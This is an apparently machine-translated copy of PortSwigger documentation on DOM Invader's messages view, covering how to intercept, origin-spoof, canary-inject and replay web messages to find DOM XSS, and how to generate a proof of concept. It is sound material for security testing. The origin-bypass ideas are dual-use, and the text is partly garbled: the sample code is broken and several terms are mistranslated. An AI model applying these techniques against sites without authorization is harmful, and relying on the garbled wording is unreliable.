Message display – PortSwigger


DOM invader messages view greatly simplifies testing for DOM XSS vulnerabilities using web messages. It allows you to intercept messages sent to the target website, view useful details about them, as well as edit and resend them to check for vulnerabilities. In some ways, this is a web message equivalent to Burp Proxy HTTP History and Burp Repeater.

You can also allow DOM Invader to automatically generate additional messages to try to identify vulnerabilities on your behalf.

If you need to review web message vulnerabilities, we’ve covered web message manipulation on the Web Security Academy, where you can also find deliberately vulnerable labs to train on.

Enabling web message interception

By default, web message interception is disabled. To enable it, click the Burp Suite icon in the upper right corner of the browser, navigate to the DOM Invader tab, and toggle the Post-message interception is enabled / disabled switch.

When prompted, click the Reload button to apply the changes. The messages view should now be available in the DevTools panel.

Post message settings

In the DOM Invader settings menu, there are also several settings that allow you to modify the behavior of DOM Invader when working with web messages:

Viewing intercepted messages

Once you have enabled web message interception, the messages view will automatically list all web messages sent on the page.

Viewing intercepted messages in DOM Invader

The messages you see depend on your settings:

  • If you enable web message interception, but none of the other web message settings, DOM Invader will intercept all sent messages and forward them unchanged.

  • If canary injection is enabled, DOM Invader will send each message a second time, with the canary injected into the data, and a third time, with both the canary a series of test characters that can be useful in constructing an exploit whether they appear uncoded or not dropped into a sink.

The following information is displayed for each message:

  • username: A unique identifier for the message. Note that if you allow DOM Invader to generate its own web messages, these will not have an ID.
  • Severity: An estimate of the degree of dangerousness of the identified vulnerability. The mere presence of a web message is always an “informational” vulnerability, but if you enable some of the additional web message options, DOM Invader will report messages where it has successfully transmitted data to a receiver, for example. Note that the Message view icon badge will turn red if the view contains particularly interesting alerts.
  • Confidence: An indication of how confident DOM Invader is that this vulnerability is present. Low-trust vulnerabilities typically require manual confirmation.
  • Type: The type of web message. It could be string, json-string, Where json-object.
  • Origin: the origin of the web message, that is, the URL scheme, domain and port of the page from which the message was sent.
  • Data: The actual content of the message.
  • Stack trace: By clicking on this link, the stack trace is sent to the console. You can use it to easily find the exact line where the message event listener occurs.

Viewing Message Details

You can click on a message to view more detailed information about it and resend the message with different values ​​to check for vulnerabilities. If you have enabled any of the additional post-message settings, you can also toggle whether you want to see the original data or the edited message data.

Viewing details of web messages in DOM Invader

DOM Invader automatically detects whether the origin, data, or source properties of the message are actually read by JavaScript on the page. This can provide clues to the usability of the message.

Origin accessed

If the origin of the message is never consulted, this indicates that it is not validated at all. As a result, you may be able to send a message from an arbitrary origin.

Even if the origin is consulted, it does not necessarily mean that the site is secure. First of all, it is not because it is accessible that it is validated. Even if it does, by digging deeper into the source code via the stack trace provided, you might be able to find a way around this validation. For ideas on how to do this, read Origin Verification in Web Security Academy.

Likewise, some websites can validate origin once, but you might be able to find other functions that don’t.

Data consulted

Because the message data is where you’ll inject potential payloads, if the site never reads the data in the first place, it can’t be passed to a receiver. The message therefore has no interest.

Source consulted

The source property of a web message is a reference to the window from which it was sent. In practice, this will generally be a reference to a iframe. Websites often validate source ownership because this is a more reliable way to ensure that the message is from a specific, trusted user. iframe.

As with the origin, keep in mind that even if the source is playing, it doesn’t necessarily mean that it is validated correctly or that this validation cannot be bypassed.

Spoofing the origin of the message

In the DOM Invader settings, you can select the Spoofing the origin of the message option. When enabled, DOM Invader will automatically replace the origin of any intercepted message with a fake origin in the following format:

For example, if you were to test on, the falsified origin would be:

Origin spoofing allows DOM Invader to identify event listeners that use faulty logic or regular expressions to validate the origin of messages. For example, this bogus origin would easily bypass any validation that checks whether the string begins or ends with a trusted domain name.

If you do not enable this option globally, you can enable it for specific messages by selecting the Usurped origin check box :

Spoof the origin of a specific web message using DOM Invader

To note

This check box is hidden whenever the original spoofing is already globally enabled.

Inject a canary via web messages

In the DOM Invader settings, you can select the Canary injection in intercepted messages option. When enabled, DOM Invader will inject the canary string into the data of all intercepted messages. The canary is highlighted in the message list.

If you click on a message, you can use the Spectacle drop-down list to toggle between original data and modified data containing the injected canary so that you can compare them.

The messages view also provides the same search functionality as the DOM view, to help you filter the list based on a particular string.

Automatic generation of new messages

In the DOM Invader settings, you can select the Generate automated messages option. When enabled, DOM Invader identifies event listeners on the page and sends its own web messages to trigger them. This is useful in cases where you want to test a potentially vulnerable event listener but either:

  • No web message is sent to the page.

  • Web messages are sent, but none of them trigger the particular listener you want to test.

DOM Invader attempts to infer information about the data structure expected by each event listener and uses it to try to send appropriate messages. Depending on how these are handled, it then generates more messages, with the data being adjusted accordingly. This allows DOM Invader to tailor its messages in order to successfully reach additional code paths that potentially lead to more dangerous pits.

For example, consider a message handler that expects to receive a URL and follows different code paths depending on whether or not it contains the string http:, https:, or neither. It might look like this:

window.addEventListener('message', function(e) {
  var url =;
  switch (true){
    case (url.indexOf("http:") > -1):
      // Do something
    case (url.indexOf("https:") > -1):
      // Do something else
      // Invalid URL: Must contain string "http:" or "https:"
}, false);

In this case, DOM Invader can send an initial message containing an empty string, but follow it with two other messages, one containing http: and a container https:, so that all three states are tested and the input flows through all three branches. These follow-up messages will also contain the same test characters that DOM Invader injects with the usual canary (<>"':) so that you can check what is escaped or encoded.

To note

The canary used in automatically generated web messages is always followed by a sequential number and a hyphen.

You can still distinguish between DOM Invader auto-generated messages because they do not receive a numeric ID.

Replay web messages

Once you’ve identified a potentially vulnerable web message, DOM Invader also makes it easy to test different ways to exploit it. When you select a web message, you can edit its properties and click Send to replay the message using new values, just like you do with HTTP requests in Burp Repeater.

For example, you can identify a message in which:

  • The event listener does not validate the origin.

  • The data is transmitted to a receiver, such as element.innerHTML.

  • Characters <> and " did not escape.

In this case, you can select the message, change the data to a typical XSS vector, such as , and click Send. If the alert() is called, you were able to find DOM XSS using the source of the web message.

Generating a proof of concept for web message vulnerabilities

Once you have successfully identified an exploitable vulnerability, DOM Invader allows you to generate an HTML proof of concept with a single click.

To do this, just select the vulnerable web message and change the values ​​as needed by the exploit, then click Create a PoC. The HTML code is saved to your clipboard so you can easily include it in a bug report or fix some of our DOM XSS labs on the Web Security Academy by delivering it to the simulated victim through the provided exploitation server .

Comments are closed.